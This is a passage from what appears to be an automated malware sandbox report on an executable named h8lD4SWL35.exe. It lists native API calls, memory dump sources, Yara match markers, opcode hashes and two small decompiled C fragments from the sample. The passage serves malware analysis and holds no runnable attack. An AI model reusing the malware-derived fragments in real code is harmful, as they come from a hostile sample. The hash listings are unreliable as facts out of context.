                                                                                • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405657
                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 190613189-0
                                                                                • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                • Instruction ID: 25fbcb832c33ec4964fd827efed06e6d871dcd69bbe6b28132c6debe6a032c6a
                                                                                • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                • Instruction Fuzzy Hash: 02F0A736249D51DBC2025B355C04E6FAA94EF92354B54097AF444F2251D33A98129BBF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: h8lD4SWL35.exe PID: 716 Parent PID: 480 h8lD4SWL35.exeCOMMON

                                                                                Executed Functions

                                                                                Function 0041826A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID: R=A$R=A
                                                                                • API String ID: 2738559852-3742021989
                                                                                • Opcode ID: 87485d30aa8cb18a713a80a56a359a952ffbdaac338d5a925230bf6c8ef1f720
                                                                                • Instruction ID: d3105f4d5f75fa6480941d81b4b8bd581525c59bab21666af283b4685eccbe10
                                                                                • Opcode Fuzzy Hash: 87485d30aa8cb18a713a80a56a359a952ffbdaac338d5a925230bf6c8ef1f720
                                                                                • Instruction Fuzzy Hash: D3F0EC71200108AFCB04DF89DC80DEB77ADAF8C714F158258BE1D97241CA30E8518BA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                0x00418273
                                                                                0x0041827f
                                                                                0x00418287
                                                                                0x00418292
                                                                                0x004182ad
                                                                                0x004182b5
                                                                                0x004182b9

                                                                                APIs
                                                                                • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID: R=A$R=A
                                                                                • API String ID: 2738559852-3742021989
                                                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041817A, Relevance: 1.6, APIs: 1, Instructions: 59filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 84ab12f38130ba6374c4d5e4bd2e4226f3d05ceb612b97be0999a57cad77d801
                                                                                • Instruction ID: 89afb2f1cf6171b8558e0c7e0ca09a0a510f862957134e4a4b828be0d8d9e918
                                                                                • Opcode Fuzzy Hash: 84ab12f38130ba6374c4d5e4bd2e4226f3d05ceb612b97be0999a57cad77d801
                                                                                • Instruction Fuzzy Hash: BF11E2B2204209BBCB08CF98DC84DEB77ADAF8C754B15864DFA5D97241CA30E8518BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004181BA, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: edcc572d20d658b09244c3f101f520ca345bd06ac2fcb3511e7a9f272df0d7fc
                                                                                • Instruction ID: fae6ffa33bf77168ea0cd424f9f4fd6a4ef7e0647b005e22d2a95e62c3cf46de
                                                                                • Opcode Fuzzy Hash: edcc572d20d658b09244c3f101f520ca345bd06ac2fcb3511e7a9f272df0d7fc
                                                                                • Instruction Fuzzy Hash: 4E01A4B2211108ABCB48CF89DC95DEB77A9EF8C754F158248FA1997241D630E8518BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: ca9673f3ae0644b396a1594a7c4336876b21773c0ba6c7f527f01b7f528083ec
                                                                                • Instruction ID: 3d1615de6c56f06f0ff5e36b46861abd4723f7fadd185fb075f4862fd2935f2c
                                                                                • Opcode Fuzzy Hash: ca9673f3ae0644b396a1594a7c4336876b21773c0ba6c7f527f01b7f528083ec
                                                                                • Instruction Fuzzy Hash: E190026160100503D24171694404656040ED7D1381F91C032A1014555FDA659992F171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 474b4846cb7e3150ab55ec08d1e9969b35fb9b48e5218bfae338c75501cddc2d
                                                                                • Instruction ID: 6df4891800f47df5f9e08221899be906ae1fcf80be08c15367bcbe41161ac993
                                                                                • Opcode Fuzzy Hash: 474b4846cb7e3150ab55ec08d1e9969b35fb9b48e5218bfae338c75501cddc2d
                                                                                • Instruction Fuzzy Hash: 0590027120100413D25161694504747040DD7D1381F91C432A0414558EE6969952F161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: df0676b926bb5472795a346498651246e71f42d804a780eeda38b72e3b04fadc
                                                                                • Instruction ID: 331cc2321284339b9588ba9105258c812fadb2e59b93484b8013687dd2800182
                                                                                • Opcode Fuzzy Hash: df0676b926bb5472795a346498651246e71f42d804a780eeda38b72e3b04fadc
                                                                                • Instruction Fuzzy Hash: 15900261242041535685B1694404547440AE7E1381B91C032A1404950DD566A856E661
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: ae21ca3e4c32c633432756de54acf6eeefc6ae974910485529e618fc5eac9993
                                                                                • Instruction ID: f49a0107b9a24f2d1451da864ef388e1cba7168369bc5c709a1ee77fd4b7d807
                                                                                • Opcode Fuzzy Hash: ae21ca3e4c32c633432756de54acf6eeefc6ae974910485529e618fc5eac9993
                                                                                • Instruction Fuzzy Hash: 269002A134100443D24061694414B460409D7E2341F51C035E1054554ED659DC52B166
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: a82f4fe4707a46e40235d3fcdbe986c6af214773b6a1d2925c56fe3a1d79f335
                                                                                • Instruction ID: a2b8023129af706a9904be323226642d2fc4e06943a47bfcf3b7b67adb9b6ac0
                                                                                • Opcode Fuzzy Hash: a82f4fe4707a46e40235d3fcdbe986c6af214773b6a1d2925c56fe3a1d79f335
                                                                                • Instruction Fuzzy Hash: 879002B120100403D280716944047860409D7D1341F51C031A5054554FD6999DD5B6A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 4dba4587f79ef45a55e2cbf286225c860941c0fe209a95e3da76f7aa65347950
                                                                                • Instruction ID: 991ae33388391909576dd74927282791e14e25267cd5d5ee5abb74eb19a36c74
                                                                                • Opcode Fuzzy Hash: 4dba4587f79ef45a55e2cbf286225c860941c0fe209a95e3da76f7aa65347950
                                                                                • Instruction Fuzzy Hash: 8B900261601000434280717988449464409FBE2351B51C131A0988550ED5999865A6A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 732c9e6a75c5b9a01135da0f5770f8be45ba7ec58b1801fc82b76b218e484222
                                                                                • Instruction ID: e6a4cf25f9f5dac928e8201cc246889bd2c2f20e61966c61743369ccb8fbb7fe
                                                                                • Opcode Fuzzy Hash: 732c9e6a75c5b9a01135da0f5770f8be45ba7ec58b1801fc82b76b218e484222
                                                                                • Instruction Fuzzy Hash: D490027120140403D2406169481474B0409D7D1342F51C031A1154555ED6659851B5B1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 5a4f160dc68b6b12274edf87a56c7cb7fd88fb8bc9d77bb1a06be446e458bae4
                                                                                • Instruction ID: c0574123a9398dfb9eb4c910035748f7a6044fb5c1d95491d4f3f7f3fd387dff
                                                                                • Opcode Fuzzy Hash: 5a4f160dc68b6b12274edf87a56c7cb7fd88fb8bc9d77bb1a06be446e458bae4
                                                                                • Instruction Fuzzy Hash: EB90026121180043D34065794C14B470409D7D1343F51C135A0144554DD9559861A561
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: ff8dac8ab9cde65165966810d1f137b3e885e3d67f8e3d053847fb572b21d313
                                                                                • Instruction ID: 015ec985d69ca0388917617d075288e35ce77591b3fdcf7ce383e8298028bb3d
                                                                                • Opcode Fuzzy Hash: ff8dac8ab9cde65165966810d1f137b3e885e3d67f8e3d053847fb572b21d313
                                                                                • Instruction Fuzzy Hash: 2D9002A120200003424571694414656440ED7E1341F51C031E1004590ED5659891B165
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: ff61d4b89cc592a6f92bac2b60aa8507def5ef27d2ad820030280c01ed977935
                                                                                • Instruction ID: 6fdc963d377834b0a064d8214de8bbad113d7f58b15d2d6f1667bfcf27c78586
                                                                                • Opcode Fuzzy Hash: ff61d4b89cc592a6f92bac2b60aa8507def5ef27d2ad820030280c01ed977935
                                                                                • Instruction Fuzzy Hash: 5C900265211000030245A5690704547044AD7D6391751C031F1005550DE6619861A161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: b84cd31270c16cea646e6f1572b786bc9f134eabf36d529e01961f4f05f96de5
                                                                                • Instruction ID: b62f8a6b413fb2177cdc4edd5fefbc2f2935ab137269409b8ec9dd0c6d14d3a7
                                                                                • Opcode Fuzzy Hash: b84cd31270c16cea646e6f1572b786bc9f134eabf36d529e01961f4f05f96de5
                                                                                • Instruction Fuzzy Hash: 0D90027120108803D2506169840478A0409D7D1341F55C431A4414658ED6D59891B161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: c42421be56613383b2e6fd6afcb73933afe3cf6e9ed368bacdfaed5aa88b00df
                                                                                • Instruction ID: 4ec6d0ab08d1ee59a6b4864bcf481c1903aaa66e194012fb41418201fa245892
                                                                                • Opcode Fuzzy Hash: c42421be56613383b2e6fd6afcb73933afe3cf6e9ed368bacdfaed5aa88b00df
                                                                                • Instruction Fuzzy Hash: F590027120100803D2C07169440468A0409D7D2341F91C035A0015654EDA559A59B7E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 25f84dd11038c7b066379deeaa3e0df1034076d379e80c4d829861b55b877b00
                                                                                • Instruction ID: ceb4d3130027b1f5628589beb108d1fdc226f9c86e3ca676adc37d3f1e3a5871
                                                                                • Opcode Fuzzy Hash: 25f84dd11038c7b066379deeaa3e0df1034076d379e80c4d829861b55b877b00
                                                                                • Instruction Fuzzy Hash: 3F90026130100003D280716954186464409E7E2341F51D031E0404554DE9559856A262
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: aeddd7eaa7688dc2b7f568ecf6efaccdaffc1a7dc0826d42344f0790fa4fee82
                                                                                • Instruction ID: c26b373f7e9dcfbc1e949bd09492a6bf0a8ebf2337154de2992019c4d7549f9e
                                                                                • Opcode Fuzzy Hash: aeddd7eaa7688dc2b7f568ecf6efaccdaffc1a7dc0826d42344f0790fa4fee82
                                                                                • Instruction Fuzzy Hash: 3290026921300003D2C07169540864A0409D7D2342F91D435A0005558DD9559869A361
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: b87d78f86d86a2a28f86b58fc1247820c0cb6246caed4aa68a63794e9e395b29
                                                                                • Instruction ID: c3b827b3f31b74d0e0caca9a2511dcdda4f382e711fed3e9a857d7da4aa8c421
                                                                                • Opcode Fuzzy Hash: b87d78f86d86a2a28f86b58fc1247820c0cb6246caed4aa68a63794e9e395b29
                                                                                • Instruction Fuzzy Hash: 1290027131114403D250616984047460409D7D2341F51C431A0814558ED6D59891B162
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 1f5c26069d83f87e1adc59bc2fa5b8b303d916ae1a0ba6c8e3c36d33b5f734b2
                                                                                • Instruction ID: 2b057bafcf461e0b902f9482d1ee2a5fe4d3375714656251b7a950b0c951bc90
                                                                                • Opcode Fuzzy Hash: 1f5c26069d83f87e1adc59bc2fa5b8b303d916ae1a0ba6c8e3c36d33b5f734b2
                                                                                • Instruction Fuzzy Hash: CC90027120100403D24065A954086860409D7E1341F51D031A5014555FD6A59891B171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004088B0, Relevance: .1, Instructions: 92COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                                • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E00407260(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				void* _t20;
				long _t23;
				intOrPtr* _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_t20 = __edx;
				_v68 = 0;
				L00419D20( &_v67, 0, 0x3f);
				L0041A900(__ebx, _t20,  &_v68, 3);
				_t12 = E00409B20(_t32, _a4 + 0x1c,  &_v68); // executed
				_t13 = L00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t27 = _t13;
				if(_t27 != 0) {
					_t23 = _a8;
					_t14 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					_t34 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t27(_t23, 0x8003, _t28 + (L00409280(_t34, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}













                                                                                0x00407260
                                                                                0x00407260
                                                                                0x0040726f
                                                                                0x00407273
                                                                                0x0040727e
                                                                                0x0040728e
                                                                                0x0040729e
                                                                                0x004072a3
                                                                                0x004072aa
                                                                                0x004072ad
                                                                                0x004072ba
                                                                                0x004072bc
                                                                                0x004072be
                                                                                0x004072db
                                                                                0x004072db
                                                                                0x00000000
                                                                                0x004072dd
                                                                                0x004072e2

                                                                                APIs
                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
